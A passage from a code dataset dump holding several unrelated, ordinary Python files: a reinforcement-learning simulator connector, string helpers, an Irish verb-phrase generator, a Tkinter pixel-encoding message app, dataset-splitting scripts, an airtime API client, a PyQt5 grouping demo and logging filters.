psutil\nfrom star import Star\nfrom random import randint\nfrom bonsai_ai import Brain, Config, Simulator\nfrom bonsai_ai.logger import Logger\nfrom bonsai_ai import EpisodeStartEvent, SimulateEvent, \\\n\tEpisodeFinishEvent, FinishedEvent, UnknownEvent\n\nimport bonsai_tools\n\nlog = Logger()\nimport argparse\n\ndef _parse_args():\n\tparser = argparse.ArgumentParser(\n\t\tdescription='bits for dev')\n\tparser.add_argument('--log-iterations', action='store_true')\n\tparser.add_argument('--log-training-speed', action='store_true')\n\tparser.add_argument('--render', action='store_true')\n\targs, unknown = parser.parse_known_args()\n\treturn args\n\nlog_iterations = _parse_args().log_iterations\nmonitor_training_speed = _parse_args().log_training_speed\nrender = _parse_args().render\nprint('log iterations: {}'.format(log_iterations))\nprint('log training speed: {}'.format(monitor_training_speed))\nprint('render simulation: {}'.format(render))\n\nclass ModelConnector(Simulator):\n\n\tdef __init__(self, brain, name, config):\n\t\tsuper(ModelConnector, self).__init__(brain, name)\n\t\tself.results_logger = None\n\t\tif log_iterations is True:\n\t\t\tself.results_logger = bonsai_tools.log_initialize(brain, pathname='./log/')\n\t\tif monitor_training_speed is True:\n\t\t\tmonitoring_logger = bonsai_tools.log_initialize(brain, pathname='./log/', log_training_speed = True)\n\t\t\tlogged_observations_dict = {'datetime':None,'num_of_sims':None,'iterations':None,'num_iterations_per_s':None}\n\t\t\tbonsai_tools.log_observations_columns(monitoring_logger, logged_observations_dict)\n\t\t\tbonsai_tools.monitor_training(monitoring_logger,logged_observations_dict, brain.name)\n\t\n\t\tself.config = config\n\t\tpass\n\nclass ModelTrainer(object):\n\n\tdef __init__(self, sim, predict=False):\n\t\tself._sim = sim\n\t\tself.episode_count = 0\n\t\tself.reset_iteration_metrics()\n\t\tself.star = Star(predict=predict, render=render)\n\t\tself.star.logger = sim.results_logger\n\t\tif log_iterations is True:\n\t\t\tself.logged_observations = self.star.define_logged_observations()\n\t\t\tself.logged_observations = self.update_logged_observations(self.logged_observations)\n\t\t\tbonsai_tools.log_observations_columns(self.star.logger, self.logged_observations)\n\n\tdef episode_start(self,event):\n\t\tif getattr(self._sim, 'sim_id', -1) == -1:\n\t\t\tself.sim_id = self._sim._impl._sim_id\n\t\t\t#if self.sim_id != -1:\n\t\t\t# print('SimID', self.sim_id)\n\t\t\t\n\t\tself.start_episode()\n\t\tself.episode_count += 1\n\t\t# Check https://docs.bons.ai/references/library-reference.html#event-class for SDK event class documentation from Product\n\t\tevent.initial_state = self.star.get_state()\n\t\tevent.terminal = self.star.get_terminal(event.initial_state)\n\t\tevent.reward = 0 #the initial reward is an arbitrary value since there are no actions taken by BRAIN in initial state\n\t\tif log_iterations is True:\n\t\t\tself.logged_observations = self.star.define_logged_observations()\n\t\t\tself.logged_observations = self.update_logged_observations(self.logged_observations)\n\t\t\tbonsai_tools.log_iteration(self.star.logger, self.logged_observations)\n\n\tdef run(self):\n\t\tevent = self._sim.get_next_event()\n\n\t\tif isinstance(event, EpisodeStartEvent):\n\t\t\tlog.event(\"Episode Start Train\")\n\t\t\tself.episode_start(event)\n\n\t\t# Receive the action from the BRAIN as event.action, run the simulation one step and return the state, action, and reward to the BRAIN. \n\t\telif isinstance(event, SimulateEvent):\n\t\t\tlog.event(\"Simulate\")\n\t\t\tself.iteration_count += 1\n\t\t\tself.action = event.action\n\t\t\tself.star.set_action(self.action)\n\t\t\tevent.state = self.star.get_state() \n\t\t\tevent.terminal = self.star.get_terminal(event.state)\n\t\t\tevent.reward = self.star.get_reward(event.state, event.terminal)\n\t\t\t#print(event.state)\n\t\t\tself.reward = event.reward\n\t\t\tself.terminal = event.terminal\n\t\t\tself.episode_reward += event.reward\n\t\t\tself.logged_observations = self.star.define_logged_observations()\n\t\t\tself.logged_observations = self.update_logged_observations(self.logged_observations)\n\t\t\tif log_iterations is True:\n\t\t\t\tbonsai_tools.log_iteration(self.star.logger, self.logged_observations)\n\t\t\telse:\n\t\t\t\tbonsai_tools.print_progress(self.logged_observations)\n\n\t\t# The episode is terminal. Finish the episode. \n\t\telif isinstance(event, EpisodeFinishEvent):\n\t\t\tlog.event(\"Episode Finish\")\t\n\t\t\tprint(\"episode count: {}, iteration count: {}, episode reward: {:6.2f}\".format(\n\t\t\t\tself.episode_count, self.iteration_count, self.episode_reward))\n\n\t\telif isinstance(event, FinishedEvent):\n\t\t\tlog.event(\"Finished\")\n\t\t\treturn False\n\n\t\telif event is None:\n\t\t\treturn False\n\t\treturn True\n\n\tdef start_episode(self, config=None):\n\t\tself.star.simulator_reset_config()\n\t\tself.reset_iteration_metrics()\n\n\tdef reset_iteration_metrics(self):\n\t\t\"\"\"Executed once every start of episode\n\t\t\"\"\"\n\t\tself.reward = 0\n\t\tself.terminal = False\n\t\tself.episode_reward = 0.0\n\t\tself.iteration_count = 0\n\t\tself._cpu_pc = psutil.cpu_percent()\n\t\tself._vmem = psutil.virtual_memory().percent\n\t\t\n\tdef update_logged_observations(self, logged_observations):\n\t\tself._cpu_pc = psutil.cpu_percent()\n\t\tself._vmem = psutil.virtual_memory().percent\n\t\tupdated_observations = {\n\t\t\t'episode_count':self.episode_count,\n\t\t\t'iteration_count':self.iteration_count,\n\t\t\t'terminal':self.terminal,\n\t\t\t'reward':self.reward,\n\t\t\t'episode_reward':self.episode_reward,\n\t\t\t'cpu_pc':self._cpu_pc,\n\t\t\t'vmem':self._vmem\n\t\t}\n\t\t#updated_observations.update(self.action)\n\t\tupdated_observations.update(logged_observations)\n\t\treturn updated_observations\n\ndef run_brain():\n\tconfig = Config(sys.argv)\n\tbrain = Brain(config)\n\tprint(\"start connect\")\n\tsim = ModelConnector(brain, \"the_simulator\", config) #this sim name needs to match what is declared in inkling\n\tif brain.config.predict:\n\t\ttrainer = ModelTrainer(sim, predict=True)\n\t\tprint(\"start predicting\")\n\telse:\n\t\tprint(\"start training\")\n\t\ttrainer = ModelTrainer(sim, predict=False)\n\twhile trainer.run():\n\t\tpass\n\nif __name__ == \"__main__\":\n\trun_brain()","sub_path":"hub.py","file_name":"hub.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"122907688","text":"\"\"\"\nCopyright (c) 2017, 2019, Oracle Corporation and/or its affiliates. All rights reserved.\nLicensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.\n\nThis module provides string manipulation helper methods that are not found in the WLST version of Jython\n\"\"\"\nfrom wlsdeploy.logging.platform_logger import PlatformLogger\n\n__logger = PlatformLogger('wlsdeploy.util')\n_class_name = 'string_utils'\n\ndef is_empty(text):\n \"\"\"\n Determine if a string value is either None or an empty string.\n :param text: the string to test\n :return: True, if the string has no content, False otherwise\n \"\"\"\n return text is None or len(text) == 0\n\ndef rsplit(text, token=' ', maxsplit=-1):\n \"\"\"\n Returns a list of the words in the provided string, separated by the delimiter string (starting from right).\n :param text: the string should be rsplit\n :param token: token dividing the string into split groups; default is space.\n :param maxsplit: Number of splits to do; default is -1 which splits all the items.\n :return: list of string elements\n \"\"\"\n if maxsplit == 0:\n result = [text]\n else:\n components = text.split(token)\n if maxsplit > 0:\n desired_length = maxsplit + 1\n result = []\n if len(components) > desired_length:\n result.append('')\n for index, value in enumerate(components):\n if index < len(components) - maxsplit:\n if index > 0:\n result[0] += token\n result[0] += value\n else:\n result.append(value)\n else:\n result = components\n return result\n\ndef to_boolean(input_value):\n \"\"\"\n Convert the input value to a proper boolean value.\n :param input_value: the value to convert\n :return: the corresponding boolean value, or False if the value is not convertible to a boolean\n \"\"\"\n _method_name = 'to_boolean'\n\n if input_value in ['True', 'true', 1]:\n result = True\n elif input_value in ['False', 'false', 0]:\n result = False\n else:\n __logger.fine('WLSDPLY-01720', input_value, class_name=_class_name, method_name=_method_name)\n result = False\n return result\n","sub_path":"core/src/main/python/wlsdeploy/util/string_utils.py","file_name":"string_utils.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"622610462","text":"# coding=UTF-8\nfrom pygramadan.verb_tense_rule import VerbTenseRule\nfrom .attributes import Mutation, PERSON_MAP, VPMood, VPPerson, VPPolarity, VPShape, VPTense, VerbMood, VerbPerson\nfrom .verb import Verb\nfrom .opers import mutate\nfrom .forms import Form\n\n\nclass VP:\n def __init__(self,\n v: Verb = None) -> None:\n self.tenses = init_tenses()\n self.moods = init_moods()\n\n if v is not None:\n self._init_verb(v)\n\n def _init_verb(self, v: Verb) -> None:\n def check_nil(tm, sm, lm, valuem):\n a: bool = v.get_lemma == 'bí'\n b: bool = tm == VPTense.Pres\n c: bool = sm == VPShape.Declar\n d: bool = lm == VPPolarity.Neg\n e: bool = valuem.startswith('fhuil')\n return a and b and c and d and e\n t: VPTense = None\n p: VPPerson = None\n s: VPShape = None\n l: VPPolarity = None\n rule: VerbTenseRule = None\n for t in v.tense_rules:\n for p in v.tense_rules[t]:\n for s in v.tense_rules[t][p]:\n for l in v.tense_rules[t][p][s]:\n for rule in v.tense_rules[t][p][s][l]:\n for form in v.tenses[rule.tense][rule.dependency][rule.person]:\n particle = rule.particle\n if rule.particle == '':\n gap = ''\n else:\n gap = ' '\n value = mutate(rule.mutation, form.value)\n if rule.pronoun == '':\n gap2 = ''\n else:\n gap2 = ' '\n if check_nil(t, s, l, value):\n value = value.replace('fhuil', 'níl')\n particle = ''\n gap = ''\n new_value = f'{particle}{gap}{value}{gap2}{rule.pronoun}'\n self.tenses[t][s][p][l].append(Form(new_value))\n\n for pers in VPPerson:\n if pers == VPPerson.Any:\n continue\n has_synthetic = False\n for form in v.moods[VerbMood.Imper][PERSON_MAP[pers]]:\n pos = form.value\n neg = f'ná {mutate(Mutation.PrefH, form.value)}'\n self.moods[VPMood.Imper][pers][VPPolarity.Pos].append(Form(pos))\n self.moods[VPMood.Imper][pers][VPPolarity.Neg].append(Form(neg))\n has_synthetic = True\n\n if not has_synthetic or pers == VPPerson.Pl1 or pers == VPPerson.Pl3:\n for form in v.moods[VerbMood.Imper][VerbPerson.Base]:\n pos = form.value + _PRONOUNS[pers]\n neg = f'ná {mutate(Mutation.PrefH, form.value)}{_PRONOUNS[pers]}'\n self.moods[VPMood.Imper][pers][VPPolarity.Pos].append(Form(pos))\n self.moods[VPMood.Imper][pers][VPPolarity.Neg].append(Form(neg))\n has_synthetic = True\n\n for pers in VPPerson:\n if pers == VPPerson.Any:\n continue\n pos_mut = Mutation.Ecl1\n neg_mut = Mutation.Len1\n neg_part = 'nár'\n\n if v.get_lemma == 'abair':\n neg_mut = Mutation.NoMut\n if v.get_lemma == 'bí':\n neg_part = 'ná'\n\n has_synthetic = False\n for form in v.moods[VerbMood.Subj][PERSON_MAP[pers]]:\n pos = f'go {mutate(pos_mut, form.value)}'\n neg = f'{neg_part} {mutate(neg_mut, form.value)}'\n self.moods[VPMood.Subj][pers][VPPolarity.Pos].append(Form(pos))\n self.moods[VPMood.Subj][pers][VPPolarity.Neg].append(Form(neg))\n has_synthetic = True\n\n if not has_synthetic or pers == VPPerson.Pl1:\n for form in v.moods[VerbMood.Subj][VerbPerson.Base]:\n pos = f'go {mutate(pos_mut, form.value)} {_PRONOUNS[pers]}'\n neg = f'{neg_part} {mutate(neg_mut, form.value)} {_PRONOUNS[pers]}'\n self.moods[VPMood.Subj][pers][VPPolarity.Pos].append(Form(pos))\n self.moods[VPMood.Subj][pers][VPPolarity.Neg].append(Form(neg))\n has_synthetic = True\n\n def print_tense(self, tense, shape, pol) -> str:\n tmp = []\n for pers in VPPerson:\n if pers == VPPerson.Any:\n continue\n tmp.append(f'{pers.name}: [' + '] ['.join([f.value for f in self.tenses[tense][shape][pers][pol]]) + '] \\n')\n return ''.join(tmp)\n\n def print_mood(self, mood, pol) -> str:\n tmp = []\n for pers in VPPerson:\n if pers == VPPerson.Any:\n continue\n tmp.append(f'{pers.name}: [' + '] ['.join([f.value for f in self.moods[mood][pers][pol]]) + '] \\n')\n return ''.join(tmp)\n\n\n_PRONOUNS = {\n VPPerson.Sg1: \" mé\",\n VPPerson.Sg2: \" tú\",\n VPPerson.Sg3Masc: \" sé\",\n VPPerson.Sg3Fem: \" sí\",\n VPPerson.Pl1: \" muid\",\n VPPerson.Pl2: \" sibh\",\n VPPerson.Pl3: \" siad\",\n VPPerson.NoSubject: \"\",\n VPPerson.Auto: \"\"\n}\n\n\ndef init_tenses():\n \"\"\"initialises the tenses dict.\"\"\"\n tenses = {}\n for t in VPTense:\n if t == VPTense.Any:\n continue\n tenses[t] = {}\n for s in VPShape:\n if s == VPShape.Any:\n continue\n tenses[t][s] = {}\n for p in VPPerson:\n if p == VPPerson.Any:\n continue\n tenses[t][s][p] = {}\n for pol in VPPolarity:\n if pol == VPPolarity.Any:\n continue\n tenses[t][s][p][pol] = []\n return tenses\n\n\ndef init_moods():\n \"\"\"initialises the moods dict.\"\"\"\n moods = {}\n for m in VPMood:\n moods[m] = {}\n for p in VPPerson:\n if p == VPPerson.Any:\n continue\n moods[m][p] = {}\n for pol in VPPolarity:\n if pol == VPPolarity.Any:\n continue\n moods[m][p][pol] = []\n return moods\n","sub_path":"pygramadan/verb_phrase.py","file_name":"verb_phrase.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428504218","text":"from PIL import Image, ImageDraw\nimport Tkinter\nfrom tkFileDialog import askopenfilename\n \nclass Sipher(Tkinter.Tk):\n \n def __init__(self, parent, message = \"Test message\"):\n Tkinter.Tk.__init__(self, parent)\n self.parent = parent\n self.create_gui()\n \n def create_gui(self):\n self.grid()\n self.resizable(0,0)\n \n #Create Sipher frame\n self.create_sipher_frame = Tkinter.Frame(self, padx=5, pady=5)\n self.create_sipher_frame.grid(column=0, row=0, sticky='EW', padx=5, pady=5)\n \n #Create message entry\n self.message_input_label = Tkinter.Label(self.create_sipher_frame, text=\"Enter message to Sipher:\", anchor='w')\n self.message_input_label.grid(column=0, row=0, sticky='EW', pady=5, padx=5)\n \n self.message_input_text = Tkinter.Entry(self.create_sipher_frame, exportselection=0)\n self.message_input_text.grid(column=0, row=1, sticky='EW', padx=5)\n \n #Save file\n self.save_sipher_image_btn = Tkinter.Button(self.create_sipher_frame, text=\"Save Sipher\", command=self.handle_file_save_btn)\n self.save_sipher_image_btn.grid(column=0, row=2, sticky='EW', padx=5, pady=5)\n \n #DeSipher frame\n self.desipher_frame = Tkinter.Frame(self, padx=5, pady=5)\n self.desipher_frame.grid(column=1, row=0, sticky='EW', padx=5, pady=5)\n \n #Open file\n self.open_sipher_image_btn = Tkinter.Button(self.desipher_frame, text=\"Open Sipher\", command=self.handle_file_select_btn)\n self.open_sipher_image_btn.grid(column=1, row=1, sticky='EW', padx=5, pady=5)\n \n #DeSipher\n self.open_sipher_image_btn = Tkinter.Button(self.desipher_frame, text=\"DeSipher\", command=self.handle_desipher_btn)\n self.open_sipher_image_btn.grid(column=1, row=3, sticky='EW', padx=5, pady=5)\n \n #Current Info\n self.current_info_text_var = Tkinter.StringVar()\n self.current_info_text_var.set(\"Create or open an existing Sipher.\")\n self.current_info_text = Tkinter.Label(self, textvariable=self.current_info_text_var)\n self.current_info_text.grid(column=2, row=0, sticky='EW', padx=5, pady=5)\n \n def handle_file_select_btn(self):\n self.sipher_filename = askopenfilename(multiple=0)\n self.current_info_text_var.set(\"Current opened Sipher is: %s\" % self.sipher_filename)\n \n def handle_desipher_btn(self):\n desipher_message = self.read_image()\n \n def handle_file_save_btn(self):\n self.message = self.message_input_text.get()\n self.message_length = self.get_message_length(self.message)\n self.sipher_image = self.draw_image((self.message_length, 1))\n self.sipher_image.save(\"sipher.png\")\n \n #Image Write\n \n def draw_image(self, size):\n im = Image.new('RGB', size)\n self.draw = ImageDraw.Draw(im)\n self.draw_pixels(self.message)\n return im\n \n def draw_pixels(self, message):\n pos = 0\n for char in message:\n self.draw.point((pos, 0) , (ord(char), 0, 0))\n pos += 1\n \n #Image Read\n \n def read_image(self):\n self.open_sipher = Image.open(self.sipher_filename)\n self.desipher_message = list(self.open_sipher.getdata(0))\n self.desipher_string_chars = []\n for num in self.desipher_message:\n self.desipher_string_chars.append(chr(num))\n self.desipher_string = ''.join(self.desipher_string_chars)\n self.current_info_text_var.set(self.desipher_string)\n \n #Utilities\n \n def get_message_length(self, message):\n return len(self.message)\n \nif __name__ == \"__main__\":\n app = Sipher(None)\n app.title('Sipher')\n app.mainloop()\n","sub_path":"duh.py","file_name":"duh.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"537484990","text":"import code.fileWriteUtils as fo\nimport code.fileLoadUtils as fl\nimport codecs\n\ndict=fl.loadFullIdfDictAsMap(\"..\\\\data\\\\idfDict.txt\")\n# fout=codecs.open(\"..\\\\result\\\\ReducedIdf.txt\",'w','utf-8')\n\nreducedDict={}\nfor key in dict:\n if dict[key][0]==1 and dict[key][1]==1:\n continue\n else:\n reducedDict[key]=dict[key]\n\nfo.writeIdfDictToFile(reducedDict,\"..\\\\result\\\\ReducedIdf.txt\")\n\n\n\n","sub_path":"code/dictReduce.py","file_name":"dictReduce.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"236098785","text":"import os\nimport random\nimport shutil\n\n# We need to change the dataset so that it is split into train/validation/test\n# portions, and labelled with a single attribute (e.g. 'color').\n\nattributes = ('color', 'number', 'shape', 'shading', 'all')\n\nattribute_label_extraction_fns = {\n 'number': lambda dir: dir.split('-')[0],\n 'color': lambda dir: dir.split('-')[1],\n 'shading': lambda dir: dir.split('-')[2],\n 'shape': lambda dir: dir.split('-')[3].rstrip('s'), # remove trailing 's'\n 'all': lambda dir: dir\n}\n\ndef copyfile(src_dir, dest_dir, file):\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n shutil.copyfile(os.path.join(src_dir, file), os.path.join(dest_dir, file))\n\ndef create_split_datasets(dataset_dir, target_dir, label_extract_fn,\n train_split_percent, validation_split_percent, test_split_percentage):\n\n dirs = []\n for (dirpath, dirnames, filenames) in os.walk(dataset_dir):\n dirs.extend(dirnames)\n break\n\n target_train_dir = os.path.join(target_dir, 'train')\n target_validation_dir = os.path.join(target_dir, 'validation')\n target_test_dir = os.path.join(target_dir, 'test')\n\n for dir in dirs:\n subdir = os.path.join(dataset_dir, dir)\n files = os.listdir(subdir)\n random.shuffle(files)\n i1 = int(len(files) * train_split_percent / 100)\n i2 = int(len(files) * (train_split_percent + validation_split_percent) / 100)\n train, validation, test = files[:i1], files[i1:i2], files[i2:]\n label = label_extract_fn(dir)\n\n for file in train:\n copyfile(subdir, os.path.join(target_train_dir, label), file)\n for file in validation:\n copyfile(subdir, os.path.join(target_validation_dir, label), file)\n for file in test:\n copyfile(subdir, os.path.join(target_test_dir, label), file)\n\ndef create_single_attribute_test_dataset(dataset_dir, target_dir, label_extract_fn):\n dirs = []\n for (dirpath, dirnames, filenames) in os.walk(dataset_dir):\n dirs.extend(dirnames)\n break\n\n for dir in dirs:\n files = os.listdir(os.path.join(dataset_dir, dir))\n label = label_extract_fn(dir)\n for file in files:\n copyfile(os.path.join(dataset_dir, dir), os.path.join(target_dir, label),\n file)\n\nfor attribute in attributes:\n create_split_datasets('data/train-v2/labelled', f'data/{attribute}',\n attribute_label_extraction_fns[attribute],\n 70, 20, 10)\n create_single_attribute_test_dataset('data/test-v2', f'data/{attribute}-test',\n attribute_label_extraction_fns[attribute])\n \n# Create an artificially small training dataset to observe overfitting\ncreate_split_datasets('data/train-v2/labelled', f'data/shape-small',\n attribute_label_extraction_fns['shape'],\n 1, 20, 79)","sub_path":"create-datasets-for-cnn.py","file_name":"create-datasets-for-cnn.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"84978358","text":"from schema import Schema, And, SchemaError\nimport json\nfrom . Service import APIService, validate_amount, validate_phone\n\n\nclass AirtimeService(APIService):\n def __init__(self, username, api_key):\n super(AirtimeService, self).__init__(username, api_key)\n\n def _init_service(self):\n super(AirtimeService, self)._init_service()\n self._baseUrl = self._baseUrl + '/version1/airtime'\n\n def send(self, phone_number=None, amount=None, recipients=None, callback=None):\n\n if phone_number is not None and amount is not None:\n recipients = [\n {'phoneNumber': str(phone_number), 'amount': str(amount)},\n ]\n\n try:\n schema = Schema([\n {\n 'phoneNumber': And(str, lambda s: validate_phone(s)),\n 'amount': And(str, lambda s: validate_amount(s))\n }\n ])\n recipients = schema.validate(recipients)\n except SchemaError as err:\n raise ValueError('Invalid recipients: ' + err.message)\n\n url = self._make_url('/send')\n data = {\n 'username': self._username,\n 'recipients': json.dumps(recipients)\n }\n return self._make_request(url, 'POST', headers=self._headers, params=None, data=data, callback=callback)\n","sub_path":"africastalking/Airtime.py","file_name":"Airtime.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"363712873","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n'''\nZetCode Advanced PyQt5 tutorial \n\nIn this example, we group items.\n\nAuthor: Jan Bodnar\nWebsite: zetcode.com \nLast edited: August 2017\n'''\n\nfrom PyQt5.QtWidgets import (QWidget, QApplication, QGraphicsScene, \n QGraphicsView, QGraphicsItemGroup, QGraphicsItem, \n QHBoxLayout)\nfrom PyQt5.QtGui import QPainter, QColor, QPen, QBrush\nfrom PyQt5.QtCore import Qt\nimport sys\n \n \nclass MyGroup(QGraphicsItemGroup):\n \n def __init__(self):\n super().__init__()\n \n self.setCursor(Qt.OpenHandCursor)\n self.setFlag(QGraphicsItem.ItemIsMovable)\n self.setFlag(QGraphicsItem.ItemIsSelectable, True)\n \n def paint(self, painter, option, widget):\n \n painter.setRenderHint(QPainter.Antialiasing)\n \n brush = QBrush(QColor(\"#333333\"))\n pen = QPen(brush, 0.5)\n pen.setStyle(Qt.DotLine)\n painter.setPen(pen)\n \n if self.isSelected():\n boundRect = self.boundingRect()\n painter.drawRect(boundRect) \n \n\nclass Scene(QGraphicsScene):\n \n def __init__(self):\n super().__init__() \n \n self.initScene()\n \n \n def initScene(self): \n \n self.r1 = self.addRect(20, 50, 120, 50)\n self.r1.setFlag(QGraphicsItem.ItemIsMovable)\n self.r1.setFlag(QGraphicsItem.ItemIsSelectable, True)\n \n self.r2 = self.addRect(150, 100, 50, 50)\n self.r2.setFlag(QGraphicsItem.ItemIsMovable)\n self.r2.setFlag(QGraphicsItem.ItemIsSelectable, True)\n\n self.c = self.addEllipse(30, 150, 60, 60)\n self.c.setFlag(QGraphicsItem.ItemIsMovable)\n self.c.setFlag(QGraphicsItem.ItemIsSelectable, True)\n \n\nclass View(QGraphicsView):\n \n def __init__(self):\n super().__init__()\n \n self.setGeometry(300, 300, 300, 300)\n \n policy = Qt.ScrollBarAlwaysOff\n \n self.setVerticalScrollBarPolicy(policy)\n self.setHorizontalScrollBarPolicy(policy)\n self.setRenderHint(QPainter.Antialiasing)\n self.setDragMode(QGraphicsView.RubberBandDrag)\n \n self.init()\n \n \n def init(self):\n \n self.group = None \n self.scene = Scene()\n self.setSceneRect(0, 0, 300, 300) \n self.setScene(self.scene) \n \n \n def keyPressEvent(self, event): \n \n key = event.key() \n \n if key == Qt.Key_U:\n \n if self.group != None and self.group.isSelected():\n \n items = self.group.childItems()\n self.scene.destroyItemGroup(self.group)\n self.group = None\n \n for item in items:\n item.setSelected(False)\n \n if key == Qt.Key_G:\n \n if self.group:\n return\n \n selectedItems = self.scene.selectedItems()\n \n if len(selectedItems) > 0:\n self.group = MyGroup()\n \n for item in selectedItems:\n self.group.addToGroup(item)\n \n self.scene.addItem(self.group)\n\n \nclass Example(QWidget):\n \n def __init__(self):\n super().__init__()\n \n self.initUI()\n \n \n def initUI(self):\n \n hbox = QHBoxLayout()\n \n self.view = View() \n hbox.addWidget(self.view)\n \n self.setLayout(hbox)\n self.setWindowTitle(\"Grouping\")\n self.setGeometry(250, 150, 300, 300)\n \n\napp = QApplication([])\nex = Example()\nex.show()\nsys.exit(app.exec_())","sub_path":"advancedpyqt5/examples/graphicsview/grouping.py","file_name":"grouping.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"441392324","text":"import collections\nimport datetime\nimport json\nimport logging\nimport time\n\n# Python 2 compatibility\ntry:\n from logging.handlers import QueueHandler\nexcept ImportError:\n from logutils.queue import QueueHandler\n\n\n# Python 2/3 hack for stringify, below\ntry:\n unicode\nexcept NameError:\n unicode = str\n\n\nnocolor = 0\nred = 31\ngreen = 32\nyellow = 33\nblue = 34\ngray = 37\nstarttime = time.time()\n\n\ndef secs_since(starttime):\n \"\"\"Return the (padded) number of whole seconds since `starttime`.\n\n :param starttime: time to calculate seconds since\n :type starttime: int number of seconds since the epoch\n :returns: number of seconds since starttime padded to 4 with 0s\n :rtype: str\n \"\"\"\n return '{0:0>4}'.format(int(time.time() - starttime))\n\n\ndef strtime():\n \"\"\"Return the current time in a string conforming to RFC3339.\n\n :returns: current time in RFC3339 format\n :rtype: str\n \"\"\"\n\n curr_time = time.time()\n fmtd_time = time.strftime('%Y-%m-%dT%H:%M:%S', time.localtime(curr_time))\n\n utc_offset = ((datetime.datetime.fromtimestamp(curr_time) -\n datetime.datetime.utcfromtimestamp(curr_time)).\n total_seconds())\n utc_hours = int(utc_offset // 3600)\n utc_mins = abs(int(utc_offset % 3600 // 60))\n\n return '{0}{1:0=+3}:{2:0>2}'.format(fmtd_time, utc_hours, utc_mins)\n\n\ndef levelcolor(level):\n \"\"\"Return the terminal color number appropriate for the logging level.\n\n :param int level: logging level in integer form\n :returns: the SGR parameter number for foreground text color\n :rtype: int\n \"\"\"\n\n if level == logging.DEBUG:\n return green\n elif level == logging.WARNING:\n return yellow\n elif level in (logging.ERROR, logging.CRITICAL):\n return red\n else:\n return blue\n\n\nclass DictLogFilter(object):\n \"\"\"A logging 'filter' that adds arbitrary data to messages.\n\n Depending on the output format type in self.output the filter converts a\n dict-type log msg to the appropriate format. The formats are intended to\n mimic the Sirupsen/logrus formats and are: 'json', 'text', and 'tty'. If\n self.output is None or a different string, 'json' formatting is used.\n\n The 'json' output format is a valid json object with current time and log\n level added to the log msg dict.\n\n The 'text' output is a 'key=val key=val' string with current time and log\n level added to the data from the log msg dict.\n\n The 'tty' output is a colorized output with the log level (truncated to\n four characters) followed by the number of seconds since program start\n followed by the 'msg' value from the log msg dict, followed by any other\n data from the dict in 'key=val key=val' format.\n \"\"\"\n\n def __init__(self, output=None):\n \"\"\"Create a DictLogFilter object, setting the output format if given.\n\n :param output: the output format\n :type output: None or str from ['json', 'text', or 'tty']\n :returns: a new DictLogFilter object\n :rtype: Dic)LogFilter\n \"\"\"\n self.output = output\n\n def filter(self, record):\n \"\"\"Format the log record if record.msg is a dict.\n\n Dispatch the record to appropriate '*filter' method depending on the\n the value of self.output. json formatting is the default.\n\n :param record: a log record instance\n :type record: logging.LogRecord\n :returns: always True to indicate the record should be handled\n :rtype: bool\n \"\"\"\n\n if not isinstance(record.msg, dict):\n return True\n\n if self.output == 'text':\n return self.text_filter(record)\n elif self.output == 'tty':\n return self.tty_filter(record)\n else:\n return self.json_filter(record)\n\n def json_filter(self, record):\n \"\"\"Format the log record in json style.\n\n :param record: a log record instance\n :type record: logging.LogRecord\n :returns: always True to indicate the record should be handled\n :rtype: bool\n \"\"\"\n # Add time and level entries.\n record.msg['time'] = strtime()\n record.msg['level'] = record.levelname.lower()\n\n # Ensure all keys and values are stringified to assist json.dumps.\n record.msg = stringify(record.msg)\n\n # Make sure msg is valid JSON.\n record.msg = json.dumps(record.msg)\n return True\n\n def tty_filter(self, record):\n \"\"\"Format the log record in tty style.\n\n :param record: a log record instance\n :type record: logging.LogRecord\n :returns: always True to indicate the record should be handled\n :rtype: bool\n \"\"\"\n\n # Ensure all keys and values are stringified.\n record.msg = stringify(record.msg)\n\n # Construct the start of the message.\n out = '\\x1b[{0}m{1}\\x1b[0m[{2}] {3}'.format(levelcolor(record.levelno),\n record.levelname[:4],\n secs_since(starttime),\n record.msg.get('msg', ''))\n\n # Pad to or truncate at 80 characters.\n out = '{0:<80}'.format(out)\n\n # Format into colorized k=v pairs\n for k, v in record.msg.items():\n if k != 'msg':\n out = out + ' \\x1b[{0}m{1}\\x1b[0m={2}'\\\n .format(levelcolor(record.levelno), k, v)\n\n record.msg = out\n\n return True\n\n def text_filter(self, record):\n \"\"\"Format the log record in text style.\n\n :param record: a log record instance\n :type record: logging.LogRecord\n :returns: always True to indicate the record should be handled\n :rtype: bool\n \"\"\"\n\n # Add time and level entries.\n record.msg['time'] = strtime()\n record.msg['level'] = record.levelname.lower()\n\n # Ensure all keys and values are stringified.\n record.msg = stringify(record.msg)\n\n # Attempt to meet the logfmt-compatible format.\n # Format into k=v pairs, quoting the v's.\n record.msg = ['{0}=\"{1}\"'.format(k, v) for k, v in record.msg.items()]\n\n # Join with a space\n record.msg = \" \".join(record.msg)\n\n return True\n\n\nclass DictQueueHandler(QueueHandler):\n \"\"\"A logging QueueHandler that does *not* convert dict msgs to strings.\n\n In order to make the log record picklable, the logging QueueHandler calls\n self.prepare, which calls self.format, before enqueuing the log record.\n This is problematic for the DictLogFilter because it converts the dict into\n a string. See https://hg.python.org/cpython/file/3.5/Lib/logging/handlers.py#l1289\n for details.\n \n This handler attempts to make the log record picklable without converting\n dict msgs to strings. If the msg is a dict, it reconstructs the dict with\n the result of calling str on all its items. If 